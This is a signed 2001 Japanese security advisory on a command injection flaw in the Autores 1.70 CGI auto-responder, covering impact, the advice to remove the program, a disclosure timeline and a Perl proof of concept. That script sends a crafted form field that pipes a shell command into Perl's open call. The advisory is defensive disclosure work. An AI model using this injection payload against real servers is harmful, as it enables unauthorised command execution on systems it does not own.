-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

======================================================================
CGI PROGRAM SECURITY ADVISORY  [Autores 1.70]               2001/07/11
======================================================================
http://www.ansi.co.jp/cgi/security/advisories/autores_2001_07_11.txt
======================================================================

■ 影響を受けるCGIプログラム

* オートレスポンダ (autores) 1.70
  (これ以前の全てのバージョンには同様の問題が存在する可能性があります。)

■ 概要

オートレスポンダ (autores) 1.70 は森下真充氏によって作成された自動メー
ル送信 CGI プログラムです。このプログラムには外部から任意のコマンドが実
行可能となるセキュリティ上の問題点があります。

オートレスポンダ (autores) 1.70:
	http://www.small-j.com/small/cgi/cgi.html (既に無効)
        http://www.small-j.com/small/ (作者のページ)

■ 解説

オートレスポンダ (autores) 1.70 では外部から与えられたデータの汚染チェッ
クを怠っているため、open 関数に対して任意の文字列を与えることが可能で
す。このため悪意ある入力が行われた場合、任意のコマンドが実行される可能
性があります。

■ 影響

CGI プログラムが各ユーザ権限で実行されるシステム (Apache + SuEXEC など)
の場合、そのユーザの権限で任意のコマンドを実行することが可能です。これ
によってユーザ環境が破壊される可能性があります。そうではない場合でも、
CGI プログラムの権限で任意の操作が可能です。

■ 回避方法

オートレスポンダ (autores) 1.70 を削除する。(対策および修正版は公開さ
れていません。)

■ 参考コード

#! /usr/bin/perl -w

use LWP::UserAgent;
use CGI;

$cgi = new CGI("");
$cgi->param(-name => "asname", -value => '| x@x.x | ls -lR > /tmp/ls-lR');
$cgi->param(-name => "mailfrom", -value => 'hoe@example.com');
$cgi->param(-name => "subject", -value => "puni");
$cgi->param(-name => "subject1", -value => "puni");
$cgi->param(-name => "autores", -value => "http://www.example.com/");
$cgi->param(-name => "readtxt", -value => "readme.txt");
$cgi->param(-name => "addrtxt", -value => "addr.txt");

$ua = new LWP::UserAgent;
$request = new HTTP::Request(POST => "http://host/auto170/main.cgi",
                             undef,
                             $cgi->query_string);
$ua->request($request);

__END__

■ 状態

2001/06/27: 通知
2001/07/11: 公開
2001/07/25: 参考コードを追加

======================================================================

(C) 2001 ASUKA NETWORK SERVICE, INC.  http://www.ansi.co.jp/
         HIRATA YASUYUKI              http://yasu.asuka.net/
All rights reserved.

* この文書に書かれている内容は無保証です。
* この文書に書かれている内容を利用して攻撃を行った場合、刑事上・民事上
  の責任を問われることがあります。
* このファイルは内容の変更 (電子署名の除去を含む) が行われない限り自由
  に再配布可能です。

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (FreeBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE7rqd4duP2KhBu8ikRAiRKAJ48K1Ha+kMqJ9rcrmEcU8cNM0R44ACfYxcy
qighnGvQsnvdEhzEoIlOAe+IPwMFATuup3jCitaZXxzdBBECJEoAoKUHyfpoaxpk
Gu7XzSim4n1RYplWAKCV3LhwvTnU6LtkZ8/2ME3MQ2iZQA==
=269U
-----END PGP SIGNATURE-----